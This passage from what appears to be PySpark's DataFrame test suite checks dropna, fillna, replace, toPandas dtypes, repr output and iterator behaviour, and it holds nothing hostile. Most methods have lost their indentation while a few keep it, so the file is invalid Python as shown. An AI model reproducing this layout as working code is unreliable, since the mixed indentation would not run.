[(u'Alice', 50, 80.1)], schema).dropna().count(),
1)
# dropping rows with a single null value
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, 80.1)], schema).dropna().count(),
0)
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, 80.1)], schema).dropna(how='any').count(),
0)
# if how = 'all', only drop rows if all values are null
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, 80.1)], schema).dropna(how='all').count(),
1)
self.assertEqual(self.spark.createDataFrame(
[(None, None, None)], schema).dropna(how='all').count(),
0)
# how and subset
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', 50, None)], schema).dropna(how='any', subset=['name', 'age']).count(),
1)
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, None)], schema).dropna(how='any', subset=['name', 'age']).count(),
0)
# threshold
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, 80.1)], schema).dropna(thresh=2).count(),
1)
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, None)], schema).dropna(thresh=2).count(),
0)
# threshold and subset
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', 50, None)], schema).dropna(thresh=2, subset=['name', 'age']).count(),
1)
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', None, 180.9)], schema).dropna(thresh=2, subset=['name', 'age']).count(),
0)
# thresh should take precedence over how
self.assertEqual(self.spark.createDataFrame(
[(u'Alice', 50, None)], schema).dropna(
how='any', thresh=2, subset=['name', 'age']).count(),
1)
def test_fillna(self):
schema = StructType([
StructField("name", StringType(), True),
StructField("age", IntegerType(), True),
StructField("height", DoubleType(), True),
StructField("spy", BooleanType(), True)])
# fillna shouldn't change non-null values
row = self.spark.createDataFrame([(u'Alice', 10, 80.1, True)], schema).fillna(50).first()
self.assertEqual(row.age, 10)
# fillna with int
row = self.spark.createDataFrame([(u'Alice', None, None, None)], schema).fillna(50).first()
self.assertEqual(row.age, 50)
self.assertEqual(row.height, 50.0)
# fillna with double
row = self.spark.createDataFrame(
[(u'Alice', None, None, None)], schema).fillna(50.1).first()
self.assertEqual(row.age, 50)
self.assertEqual(row.height, 50.1)
# fillna with bool
row = self.spark.createDataFrame(
[(u'Alice', None, None, None)], schema).fillna(True).first()
self.assertEqual(row.age, None)
self.assertEqual(row.spy, True)
# fillna with string
row = self.spark.createDataFrame([(None, None, None, None)], schema).fillna("hello").first()
self.assertEqual(row.name, u"hello")
self.assertEqual(row.age, None)
# fillna with subset specified for numeric cols
row = self.spark.createDataFrame(
[(None, None, None, None)], schema).fillna(50, subset=['name', 'age']).first()
self.assertEqual(row.name, None)
self.assertEqual(row.age, 50)
self.assertEqual(row.height, None)
self.assertEqual(row.spy, None)
# fillna with subset specified for string cols
row = self.spark.createDataFrame(
[(None, None, None, None)], schema).fillna("haha", subset=['name', 'age']).first()
self.assertEqual(row.name, "haha")
self.assertEqual(row.age, None)
self.assertEqual(row.height, None)
self.assertEqual(row.spy, None)
# fillna with subset specified for bool cols
row = self.spark.createDataFrame(
[(None, None, None, None)], schema).fillna(True, subset=['name', 'spy']).first()
self.assertEqual(row.name, None)
self.assertEqual(row.age, None)
self.assertEqual(row.height, None)
self.assertEqual(row.spy, True)
# fillna with dictionary for boolean types
row = self.spark.createDataFrame([Row(a=None), Row(a=True)]).fillna({"a": True}).first()
self.assertEqual(row.a, True)
def test_repartitionByRange_dataframe(self):
schema = StructType([
StructField("name", StringType(), True),
StructField("age", IntegerType(), True),
StructField("height", DoubleType(), True)])
df1 = self.spark.createDataFrame(
[(u'Bob', 27, 66.0), (u'Alice', 10, 10.0), (u'Bob', 10, 66.0)], schema)
df2 = self.spark.createDataFrame(
[(u'Alice', 10, 10.0), (u'Bob', 10, 66.0), (u'Bob', 27, 66.0)], schema)
# test repartitionByRange(numPartitions, *cols)
df3 = df1.repartitionByRange(2, "name", "age")
self.assertEqual(df3.rdd.getNumPartitions(), 2)
self.assertEqual(df3.rdd.first(), df2.rdd.first())
self.assertEqual(df3.rdd.take(3), df2.rdd.take(3))
# test repartitionByRange(numPartitions, *cols)
df4 = df1.repartitionByRange(3, "name", "age")
self.assertEqual(df4.rdd.getNumPartitions(), 3)
self.assertEqual(df4.rdd.first(), df2.rdd.first())
self.assertEqual(df4.rdd.take(3), df2.rdd.take(3))
# test repartitionByRange(*cols)
df5 = df1.repartitionByRange(5, "name", "age")
self.assertEqual(df5.rdd.first(), df2.rdd.first())
self.assertEqual(df5.rdd.take(3), df2.rdd.take(3))
    def test_replace(self):
        """replace() semantics: scalar/list/tuple/dict to_replace forms,
        subsets, mixed numeric types, booleans, replacement with None, and
        argument validation errors."""
        schema = StructType([
            StructField("name", StringType(), True),
            StructField("age", IntegerType(), True),
            StructField("height", DoubleType(), True)])
        # replace with int
        row = self.spark.createDataFrame([(u'Alice', 10, 10.0)], schema).replace(10, 20).first()
        self.assertEqual(row.age, 20)
        self.assertEqual(row.height, 20.0)
        # replace with double
        row = self.spark.createDataFrame(
            [(u'Alice', 80, 80.0)], schema).replace(80.0, 82.1).first()
        self.assertEqual(row.age, 82)
        self.assertEqual(row.height, 82.1)
        # replace with string
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 80.1)], schema).replace(u'Alice', u'Ann').first()
        self.assertEqual(row.name, u"Ann")
        self.assertEqual(row.age, 10)
        # replace with subset specified by a string of a column name w/ actual change
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 80.1)], schema).replace(10, 20, subset='age').first()
        self.assertEqual(row.age, 20)
        # replace with subset specified by a string of a column name w/o actual change
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 80.1)], schema).replace(10, 20, subset='height').first()
        self.assertEqual(row.age, 10)
        # replace with subset specified with one column replaced, another column not in subset
        # stays unchanged.
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 10.0)], schema).replace(10, 20, subset=['name', 'age']).first()
        self.assertEqual(row.name, u'Alice')
        self.assertEqual(row.age, 20)
        self.assertEqual(row.height, 10.0)
        # replace with subset specified but no column will be replaced
        row = self.spark.createDataFrame(
            [(u'Alice', 10, None)], schema).replace(10, 20, subset=['name', 'height']).first()
        self.assertEqual(row.name, u'Alice')
        self.assertEqual(row.age, 10)
        self.assertEqual(row.height, None)
        # replace with lists
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 80.1)], schema).replace([u'Alice'], [u'Ann']).first()
        self.assertTupleEqual(row, (u'Ann', 10, 80.1))
        # replace with dict
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 80.1)], schema).replace({10: 11}).first()
        self.assertTupleEqual(row, (u'Alice', 11, 80.1))
        # test backward compatibility with dummy value
        dummy_value = 1
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 80.1)], schema).replace({'Alice': 'Bob'}, dummy_value).first()
        self.assertTupleEqual(row, (u'Bob', 10, 80.1))
        # test dict with mixed numerics
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 80.1)], schema).replace({10: -10, 80.1: 90.5}).first()
        self.assertTupleEqual(row, (u'Alice', -10, 90.5))
        # replace with tuples
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 80.1)], schema).replace((u'Alice', ), (u'Bob', )).first()
        self.assertTupleEqual(row, (u'Bob', 10, 80.1))
        # replace multiple columns
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 80.0)], schema).replace((10, 80.0), (20, 90)).first()
        self.assertTupleEqual(row, (u'Alice', 20, 90.0))
        # test for mixed numerics
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 80.0)], schema).replace((10, 80), (20, 90.5)).first()
        self.assertTupleEqual(row, (u'Alice', 20, 90.5))
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 80.0)], schema).replace({10: 20, 80: 90.5}).first()
        self.assertTupleEqual(row, (u'Alice', 20, 90.5))
        # replace with boolean
        row = (self
               .spark.createDataFrame([(u'Alice', 10, 80.0)], schema)
               .selectExpr("name = 'Bob'", 'age <= 15')
               .replace(False, True).first())
        self.assertTupleEqual(row, (True, True))
        # replace string with None and then drop None rows
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 80.0)], schema).replace(u'Alice', None).dropna()
        self.assertEqual(row.count(), 0)
        # replace with number and None
        row = self.spark.createDataFrame(
            [(u'Alice', 10, 80.0)], schema).replace([10, 80], [20, None]).first()
        self.assertTupleEqual(row, (u'Alice', 20, None))
        # should fail if subset is not list, tuple or None
        with self.assertRaises(TypeError):
            self.spark.createDataFrame(
                [(u'Alice', 10, 80.1)], schema).replace({10: 11}, subset=1).first()
        # should fail if to_replace and value have different length
        with self.assertRaises(ValueError):
            self.spark.createDataFrame(
                [(u'Alice', 10, 80.1)], schema).replace(["Alice", "Bob"], ["Eve"]).first()
        # should fail if when received unexpected type
        with self.assertRaises(TypeError):
            from datetime import datetime
            self.spark.createDataFrame(
                [(u'Alice', 10, 80.1)], schema).replace(datetime.now(), datetime.now()).first()
        # should fail if provided mixed type replacements
        with self.assertRaises(ValueError):
            self.spark.createDataFrame(
                [(u'Alice', 10, 80.1)], schema).replace(["Alice", 10], ["Eve", 20]).first()
        with self.assertRaises(ValueError):
            self.spark.createDataFrame(
                [(u'Alice', 10, 80.1)], schema).replace({u"Alice": u"Bob", 10: 20}).first()
        with self.assertRaisesRegex(
                TypeError,
                'value argument is required when to_replace is not a dictionary.'):
            self.spark.createDataFrame(
                [(u'Alice', 10, 80.0)], schema).replace(["Alice", "Bob"]).first()
def test_with_column_with_existing_name(self):
keys = self.df.withColumn("key", self.df.key).select("key").collect()
self.assertEqual([r.key for r in keys], list(range(100)))
# regression test for SPARK-10417
def test_column_iterator(self):
def foo():
for x in self.df.key:
break
self.assertRaises(TypeError, foo)
def test_generic_hints(self):
from pyspark.sql import DataFrame
df1 = self.spark.range(10e10).toDF("id")
df2 = self.spark.range(10e10).toDF("id")
self.assertIsInstance(df1.hint("broadcast"), DataFrame)
self.assertIsInstance(df1.hint("broadcast", []), DataFrame)
# Dummy rules
self.assertIsInstance(df1.hint("broadcast", "foo", "bar"), DataFrame)
self.assertIsInstance(df1.hint("broadcast", ["foo", "bar"]), DataFrame)
plan = df1.join(df2.hint("broadcast"), "id")._jdf.queryExecution().executedPlan()
self.assertEqual(1, plan.toString().count("BroadcastHashJoin"))
# add tests for SPARK-23647 (test more types for hint)
def test_extended_hint_types(self):
df = self.spark.range(10e10).toDF("id")
such_a_nice_list = ["itworks1", "itworks2", "itworks3"]
hinted_df = df.hint("my awesome hint", 1.2345, "what", such_a_nice_list)
logical_plan = hinted_df._jdf.queryExecution().logical()
self.assertEqual(1, logical_plan.toString().count("1.2345"))
self.assertEqual(1, logical_plan.toString().count("what"))
self.assertEqual(3, logical_plan.toString().count("itworks"))
def test_sample(self):
self.assertRaisesRegex(
TypeError,
"should be a bool, float and number",
lambda: self.spark.range(1).sample())
self.assertRaises(
TypeError,
lambda: self.spark.range(1).sample("a"))
self.assertRaises(
TypeError,
lambda: self.spark.range(1).sample(seed="abc"))
self.assertRaises(
IllegalArgumentException,
lambda: self.spark.range(1).sample(-1.0))
def test_toDF_with_schema_string(self):
data = [Row(key=i, value=str(i)) for i in range(100)]
rdd = self.sc.parallelize(data, 5)
df = rdd.toDF("key: int, value: string")
self.assertEqual(df.schema.simpleString(), "struct<key:int,value:string>")
self.assertEqual(df.collect(), data)
# different but compatible field types can be used.
df = rdd.toDF("key: string, value: string")
self.assertEqual(df.schema.simpleString(), "struct<key:string,value:string>")
self.assertEqual(df.collect(), [Row(key=str(i), value=str(i)) for i in range(100)])
# field names can differ.
df = rdd.toDF(" a: int, b: string ")
self.assertEqual(df.schema.simpleString(), "struct<a:int,b:string>")
self.assertEqual(df.collect(), data)
# number of fields must match.
self.assertRaisesRegex(Exception, "Length of object",
lambda: rdd.toDF("key: int").collect())
# field types mismatch will cause exception at runtime.
self.assertRaisesRegex(Exception, "FloatType can not accept",
lambda: rdd.toDF("key: float, value: string").collect())
# flat schema values will be wrapped into row.
df = rdd.map(lambda row: row.key).toDF("int")
self.assertEqual(df.schema.simpleString(), "struct<value:int>")
self.assertEqual(df.collect(), [Row(key=i) for i in range(100)])
# users can use DataType directly instead of data type string.
df = rdd.map(lambda row: row.key).toDF(IntegerType())
self.assertEqual(df.schema.simpleString(), "struct<value:int>")
self.assertEqual(df.collect(), [Row(key=i) for i in range(100)])
def test_join_without_on(self):
df1 = self.spark.range(1).toDF("a")
df2 = self.spark.range(1).toDF("b")
with self.sql_conf({"spark.sql.crossJoin.enabled": False}):
self.assertRaises(AnalysisException, lambda: df1.join(df2, how="inner").collect())
with self.sql_conf({"spark.sql.crossJoin.enabled": True}):
actual = df1.join(df2, how="inner").collect()
expected = [Row(a=0, b=0)]
self.assertEqual(actual, expected)
# Regression test for invalid join methods when on is None, Spark-14761
def test_invalid_join_method(self):
df1 = self.spark.createDataFrame([("Alice", 5), ("Bob", 8)], ["name", "age"])
df2 = self.spark.createDataFrame([("Alice", 80), ("Bob", 90)], ["name", "height"])
self.assertRaises(IllegalArgumentException, lambda: df1.join(df2, how="invalid-join-type"))
# Cartesian products require cross join syntax
def test_require_cross(self):
df1 = self.spark.createDataFrame([(1, "1")], ("key", "value"))
df2 = self.spark.createDataFrame([(1, "1")], ("key", "value"))
with self.sql_conf({"spark.sql.crossJoin.enabled": False}):
# joins without conditions require cross join syntax
self.assertRaises(AnalysisException, lambda: df1.join(df2).collect())
# works with crossJoin
self.assertEqual(1, df1.crossJoin(df2).count())
def test_cache(self):
spark = self.spark
with self.tempView("tab1", "tab2"):
spark.createDataFrame([(2, 2), (3, 3)]).createOrReplaceTempView("tab1")
spark.createDataFrame([(2, 2), (3, 3)]).createOrReplaceTempView("tab2")
self.assertFalse(spark.catalog.isCached("tab1"))
self.assertFalse(spark.catalog.isCached("tab2"))
spark.catalog.cacheTable("tab1")
self.assertTrue(spark.catalog.isCached("tab1"))
self.assertFalse(spark.catalog.isCached("tab2"))
spark.catalog.cacheTable("tab2")
spark.catalog.uncacheTable("tab1")
self.assertFalse(spark.catalog.isCached("tab1"))
self.assertTrue(spark.catalog.isCached("tab2"))
spark.catalog.clearCache()
self.assertFalse(spark.catalog.isCached("tab1"))
self.assertFalse(spark.catalog.isCached("tab2"))
self.assertRaisesRegex(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.isCached("does_not_exist"))
self.assertRaisesRegex(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.cacheTable("does_not_exist"))
self.assertRaisesRegex(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.uncacheTable("does_not_exist"))
def _to_pandas(self):
from datetime import datetime, date
schema = StructType().add("a", IntegerType()).add("b", StringType())\
.add("c", BooleanType()).add("d", FloatType())\
.add("dt", DateType()).add("ts", TimestampType())
data = [
(1, "foo", True, 3.0, date(1969, 1, 1), datetime(1969, 1, 1, 1, 1, 1)),
(2, "foo", True, 5.0, None, None),
(3, "bar", False, -1.0, date(2012, 3, 3), datetime(2012, 3, 3, 3, 3, 3)),
(4, "bar", False, 6.0, date(2100, 4, 4), datetime(2100, 4, 4, 4, 4, 4)),
]
df = self.spark.createDataFrame(data, schema)
return df.toPandas()
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_to_pandas(self):
import numpy as np
pdf = self._to_pandas()
types = pdf.dtypes
self.assertEqual(types[0], np.int32)
self.assertEqual(types[1], np.object)
self.assertEqual(types[2], np.bool)
self.assertEqual(types[3], np.float32)
self.assertEqual(types[4], np.object) # datetime.date
self.assertEqual(types[5], 'datetime64[ns]')
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_to_pandas_with_duplicated_column_names(self):
import numpy as np
sql = "select 1 v, 1 v"
for arrowEnabled in [False, True]:
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": arrowEnabled}):
df = self.spark.sql(sql)
pdf = df.toPandas()
types = pdf.dtypes
self.assertEqual(types.iloc[0], np.int32)
self.assertEqual(types.iloc[1], np.int32)
# toPandas() after a cross join (which duplicates the `v` column name) must
# work under both arrow-enabled and plain conversion.
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_to_pandas_on_cross_join(self):
import numpy as np
sql = """
select t1.*, t2.* from (
select explode(sequence(1, 3)) v
) t1 left join (
select explode(sequence(1, 3)) v
) t2
"""
for arrowEnabled in [False, True]:
with self.sql_conf({"spark.sql.crossJoin.enabled": True,
"spark.sql.execution.arrow.pyspark.enabled": arrowEnabled}):
df = self.spark.sql(sql)
pdf = df.toPandas()
types = pdf.dtypes
self.assertEqual(types.iloc[0], np.int32)
self.assertEqual(types.iloc[1], np.int32)
# When pandas is absent, toPandas() must fail with a clear ImportError
# rather than some downstream AttributeError.
@unittest.skipIf(have_pandas, "Required Pandas was found.")
def test_to_pandas_required_pandas_not_found(self):
with QuietTest(self.sc):
with self.assertRaisesRegex(ImportError, 'Pandas >= .* must be installed'):
self._to_pandas()
@unittest.skipIf(not have_pandas, pandas_requirement_message)  # type: ignore
def test_to_pandas_avoid_astype(self):
    """Nullable int columns must come back as float64 (NaN cannot live in an
    int column); string columns as object dtype."""
    import numpy as np
    schema = StructType().add("a", IntegerType()).add("b", StringType()) \
        .add("c", IntegerType())
    data = [(1, "foo", 16777220), (None, "bar", None)]
    df = self.spark.createDataFrame(data, schema)
    types = df.toPandas().dtypes
    # `np.object` was deprecated in NumPy 1.20 and removed in 1.24; the builtin
    # `object` is equivalent.  .iloc avoids positional Series __getitem__.
    self.assertEqual(types.iloc[0], np.float64)  # NaN forces int -> float64
    self.assertEqual(types.iloc[1], object)
    self.assertEqual(types.iloc[2], np.float64)
# SPARK-29188: an empty result set must report the same dtypes as a
# non-empty one (no silent dtype widening on the empty path).
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_to_pandas_from_empty_dataframe(self):
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
# SPARK-29188 test that toPandas() on an empty dataframe has the correct dtypes
import numpy as np
sql = """
SELECT CAST(1 AS TINYINT) AS tinyint,
CAST(1 AS SMALLINT) AS smallint,
CAST(1 AS INT) AS int,
CAST(1 AS BIGINT) AS bigint,
CAST(0 AS FLOAT) AS float,
CAST(0 AS DOUBLE) AS double,
CAST(1 AS BOOLEAN) AS boolean,
CAST('foo' AS STRING) AS string,
CAST('2019-01-01' AS TIMESTAMP) AS timestamp
"""
dtypes_when_nonempty_df = self.spark.sql(sql).toPandas().dtypes
dtypes_when_empty_df = self.spark.sql(sql).filter("False").toPandas().dtypes
self.assertTrue(np.all(dtypes_when_empty_df == dtypes_when_nonempty_df))
@unittest.skipIf(not have_pandas, pandas_requirement_message)  # type: ignore
def test_to_pandas_from_null_dataframe(self):
    """SPARK-29188: toPandas() on a dataframe of only NULLs must widen the
    numeric columns to float (NaN-capable) and keep booleans/strings as object."""
    with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
        import numpy as np
        sql = """
            SELECT CAST(NULL AS TINYINT) AS tinyint,
                   CAST(NULL AS SMALLINT) AS smallint,
                   CAST(NULL AS INT) AS int,
                   CAST(NULL AS BIGINT) AS bigint,
                   CAST(NULL AS FLOAT) AS float,
                   CAST(NULL AS DOUBLE) AS double,
                   CAST(NULL AS BOOLEAN) AS boolean,
                   CAST(NULL AS STRING) AS string,
                   CAST(NULL AS TIMESTAMP) AS timestamp
            """
        pdf = self.spark.sql(sql).toPandas()
        types = pdf.dtypes
        # `np.object` was removed in NumPy 1.24 -- use the builtin `object`.
        # Positional Series access goes through .iloc, as in the sibling tests.
        self.assertEqual(types.iloc[0], np.float64)
        self.assertEqual(types.iloc[1], np.float64)
        self.assertEqual(types.iloc[2], np.float64)
        self.assertEqual(types.iloc[3], np.float64)
        self.assertEqual(types.iloc[4], np.float32)
        self.assertEqual(types.iloc[5], np.float64)
        self.assertEqual(types.iloc[6], object)
        self.assertEqual(types.iloc[7], object)
        self.assertTrue(np.can_cast(np.datetime64, types.iloc[8]))
# SPARK-29188: an all-NULL slice of a mixed dataframe must report the same
# dtypes as the dataframe with some non-null rows.
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_to_pandas_from_mixed_dataframe(self):
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
# SPARK-29188 test that toPandas() on a dataframe with some nulls has correct dtypes
import numpy as np
sql = """
SELECT CAST(col1 AS TINYINT) AS tinyint,
CAST(col2 AS SMALLINT) AS smallint,
CAST(col3 AS INT) AS int,
CAST(col4 AS BIGINT) AS bigint,
CAST(col5 AS FLOAT) AS float,
CAST(col6 AS DOUBLE) AS double,
CAST(col7 AS BOOLEAN) AS boolean,
CAST(col8 AS STRING) AS string,
timestamp_seconds(col9) AS timestamp
FROM VALUES (1, 1, 1, 1, 1, 1, 1, 1, 1),
(NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)
"""
pdf_with_some_nulls = self.spark.sql(sql).toPandas()
pdf_with_only_nulls = self.spark.sql(sql).filter('tinyint is null').toPandas()
self.assertTrue(np.all(pdf_with_only_nulls.dtypes == pdf_with_some_nulls.dtypes))
# Regression check: int64 extremes in an array.array survive createDataFrame.
# NOTE(review): typecode 'l' is platform-dependent (32-bit on Windows/LLP64),
# so the INT64 min/max literals would overflow there -- 'q' would be portable;
# confirm intent before changing.
def test_create_dataframe_from_array_of_long(self):
import array
data = [Row(longarray=array.array('l', [-9223372036854775808, 0, 9223372036854775807]))]
df = self.spark.createDataFrame(data)
self.assertEqual(df.first(), Row(longarray=[-9223372036854775808, 0, 9223372036854775807]))
# pandas datetime/date columns must infer to TimestampType/DateType, both
# with and without an explicit schema string.
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_create_dataframe_from_pandas_with_timestamp(self):
import pandas as pd
from datetime import datetime
pdf = pd.DataFrame({"ts": [datetime(2017, 10, 31, 1, 1, 1)],
"d": [pd.Timestamp.now().date()]}, columns=["d", "ts"])
# test types are inferred correctly without specifying schema
df = self.spark.createDataFrame(pdf)
self.assertTrue(isinstance(df.schema['ts'].dataType, TimestampType))
self.assertTrue(isinstance(df.schema['d'].dataType, DateType))
# test with schema will accept pdf as input
df = self.spark.createDataFrame(pdf, schema="d date, ts timestamp")
self.assertTrue(isinstance(df.schema['ts'].dataType, TimestampType))
self.assertTrue(isinstance(df.schema['d'].dataType, DateType))
# Without pandas installed, createDataFrame(pdf) must raise a descriptive
# ImportError (either our message or the bare module-not-found).
@unittest.skipIf(have_pandas, "Required Pandas was found.")
def test_create_dataframe_required_pandas_not_found(self):
with QuietTest(self.sc):
with self.assertRaisesRegex(
ImportError,
"(Pandas >= .* must be installed|No module named '?pandas'?)"):
import pandas as pd
from datetime import datetime
pdf = pd.DataFrame({"ts": [datetime(2017, 10, 31, 1, 1, 1)],
"d": [pd.Timestamp.now().date()]})
self.spark.createDataFrame(pdf)
# Regression test for SPARK-23360
# A timestamp near a DST transition must round-trip pandas -> Spark -> pandas
# unchanged, both in the default zone and with TZ forced to America/Los_Angeles.
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_create_dataframe_from_pandas_with_dst(self):
import pandas as pd
from pandas.testing import assert_frame_equal
from datetime import datetime
pdf = pd.DataFrame({'time': [datetime(2015, 10, 31, 22, 30)]})
df = self.spark.createDataFrame(pdf)
assert_frame_equal(pdf, df.toPandas())
orig_env_tz = os.environ.get('TZ', None)
try:
tz = 'America/Los_Angeles'
os.environ['TZ'] = tz
time.tzset()
with self.sql_conf({'spark.sql.session.timeZone': tz}):
df = self.spark.createDataFrame(pdf)
assert_frame_equal(pdf, df.toPandas())
finally:
# Always restore the process-wide TZ, even on assertion failure.
del os.environ['TZ']
if orig_env_tz is not None:
os.environ['TZ'] = orig_env_tz
time.tzset()
# Exercises __repr__ and _repr_html_ under the three eager-evaluation configs:
# enabled (plain + HTML tables, truncation, row limits) and disabled (schema
# string only, _repr_html_ -> None).  The `|` margins in the expected strings
# are stripped by the regex before comparison.
def test_repr_behaviors(self):
import re
pattern = re.compile(r'^ *\|', re.MULTILINE)
df = self.spark.createDataFrame([(1, "1"), (22222, "22222")], ("key", "value"))
# test when eager evaluation is enabled and _repr_html_ will not be called
with self.sql_conf({"spark.sql.repl.eagerEval.enabled": True}):
expected1 = """+-----+-----+
|| key|value|
|+-----+-----+
|| 1| 1|
||22222|22222|
|+-----+-----+
|"""
self.assertEqual(re.sub(pattern, '', expected1), df.__repr__())
with self.sql_conf({"spark.sql.repl.eagerEval.truncate": 3}):
expected2 = """+---+-----+
||key|value|
|+---+-----+
|| 1| 1|
||222| 222|
|+---+-----+
|"""
self.assertEqual(re.sub(pattern, '', expected2), df.__repr__())
with self.sql_conf({"spark.sql.repl.eagerEval.maxNumRows": 1}):
expected3 = """+---+-----+
||key|value|
|+---+-----+
|| 1| 1|
|+---+-----+
|only showing top 1 row
|"""
self.assertEqual(re.sub(pattern, '', expected3), df.__repr__())
# test when eager evaluation is enabled and _repr_html_ will be called
with self.sql_conf({"spark.sql.repl.eagerEval.enabled": True}):
expected1 = """<table border='1'>
|<tr><th>key</th><th>value</th></tr>
|<tr><td>1</td><td>1</td></tr>
|<tr><td>22222</td><td>22222</td></tr>
|</table>
|"""
self.assertEqual(re.sub(pattern, '', expected1), df._repr_html_())
with self.sql_conf({"spark.sql.repl.eagerEval.truncate": 3}):
expected2 = """<table border='1'>
|<tr><th>key</th><th>value</th></tr>
|<tr><td>1</td><td>1</td></tr>
|<tr><td>222</td><td>222</td></tr>
|</table>
|"""
self.assertEqual(re.sub(pattern, '', expected2), df._repr_html_())
with self.sql_conf({"spark.sql.repl.eagerEval.maxNumRows": 1}):
expected3 = """<table border='1'>
|<tr><th>key</th><th>value</th></tr>
|<tr><td>1</td><td>1</td></tr>
|</table>
|only showing top 1 row
|"""
self.assertEqual(re.sub(pattern, '', expected3), df._repr_html_())
# test when eager evaluation is disabled and _repr_html_ will be called
with self.sql_conf({"spark.sql.repl.eagerEval.enabled": False}):
expected = "DataFrame[key: bigint, value: string]"
self.assertEqual(None, df._repr_html_())
self.assertEqual(expected, df.__repr__())
with self.sql_conf({"spark.sql.repl.eagerEval.truncate": 3}):
self.assertEqual(None, df._repr_html_())
self.assertEqual(expected, df.__repr__())
with self.sql_conf({"spark.sql.repl.eagerEval.maxNumRows": 1}):
self.assertEqual(None, df._repr_html_())
self.assertEqual(expected, df.__repr__())
# toLocalIterator() must yield the same rows as collect(), including when
# some partitions are empty (more partitions than rows).
def test_to_local_iterator(self):
df = self.spark.range(8, numPartitions=4)
expected = df.collect()
it = df.toLocalIterator()
self.assertEqual(expected, list(it))
# Test DataFrame with empty partition
df = self.spark.range(3, numPartitions=4)
it = df.toLocalIterator()
expected = df.collect()
self.assertEqual(expected, list(it))
# Same result contract as toLocalIterator(), with partition prefetching on.
def test_to_local_iterator_prefetch(self):
df = self.spark.range(8, numPartitions=4)
expected = df.collect()
it = df.toLocalIterator(prefetchPartitions=True)
self.assertEqual(expected, list(it))
# SPARK-23961: abandoning a toLocalIterator() mid-stream must not raise and
# must not break subsequent operations on the same DataFrame.
def test_to_local_iterator_not_fully_consumed(self):
# SPARK-23961: toLocalIterator throws exception when not fully consumed
# Create a DataFrame large enough so that write to socket will eventually block
df = self.spark.range(1 << 20, numPartitions=2)
it = df.toLocalIterator()
self.assertEqual(df.take(1)[0], next(it))
with QuietTest(self.sc):
it = None # remove iterator from scope, socket is closed when cleaned up
# Make sure normal df operations still work
result = []
for i, row in enumerate(df.toLocalIterator()):
result.append(row)
if i == 7:
break
self.assertEqual(df.take(8), result)
# sameSemantics() must reject non-DataFrame arguments with a TypeError.
def test_same_semantics_error(self):
with QuietTest(self.sc):
with self.assertRaisesRegex(TypeError, "should be of DataFrame.*int"):
self.spark.range(10).sameSemantics(1)
# inputFiles() on a 10-partition parquet write must list exactly the 10 part
# files, all rooted under the written directory.
def test_input_files(self):
tpath = tempfile.mkdtemp()
shutil.rmtree(tpath)
try:
self.spark.range(1, 100, 1, 10).write.parquet(tpath)
# read parquet file and get the input files list
input_files_list = self.spark.read.parquet(tpath).inputFiles()
# input files list should contain 10 entries
self.assertEqual(len(input_files_list), 10)
# all file paths in list must contain tpath
for file_path in input_files_list:
self.assertTrue(tpath in file_path)
finally:
shutil.rmtree(tpath)
# SPARK-35408: DataFrame.show must accept coercible parameters and produce
# targeted TypeErrors naming the offending parameter otherwise.
def test_df_show(self):
# SPARK-35408: ensure better diagnostics if incorrect parameters are passed
# to DataFrame.show
df = self.spark.createDataFrame([('foo',)])
df.show(5)
df.show(5, True)
df.show(5, 1, True)
df.show(n=5, truncate='1', vertical=False)
df.show(n=5, truncate=1.5, vertical=False)
with self.assertRaisesRegex(TypeError, "Parameter 'n'"):
df.show(True)
with self.assertRaisesRegex(TypeError, "Parameter 'vertical'"):
df.show(vertical='foo')
with self.assertRaisesRegex(TypeError, "Parameter 'truncate=foo'"):
df.show(truncate='foo')
# to_pandas_on_spark() must round-trip to the equivalent pandas frame, with
# and without promoting a column to the index via index_col.
@unittest.skipIf(
not have_pandas or not have_pyarrow,
pandas_requirement_message or pyarrow_requirement_message) # type: ignore
def test_to_pandas_on_spark(self):
import pandas as pd
from pandas.testing import assert_frame_equal
sdf = self.spark.createDataFrame([("a", 1), ("b", 2), ("c", 3)], ["Col1", "Col2"])
psdf_from_sdf = sdf.to_pandas_on_spark()
psdf_from_sdf_with_index = sdf.to_pandas_on_spark(index_col="Col1")
pdf = pd.DataFrame({"Col1": ["a", "b", "c"], "Col2": [1, 2, 3]})
pdf_with_index = pdf.set_index("Col1")
assert_frame_equal(pdf, psdf_from_sdf.to_pandas())
assert_frame_equal(pdf_with_index, psdf_from_sdf_with_index.to_pandas())
class QueryExecutionListenerTests(unittest.TestCase, SQLTestUtils):
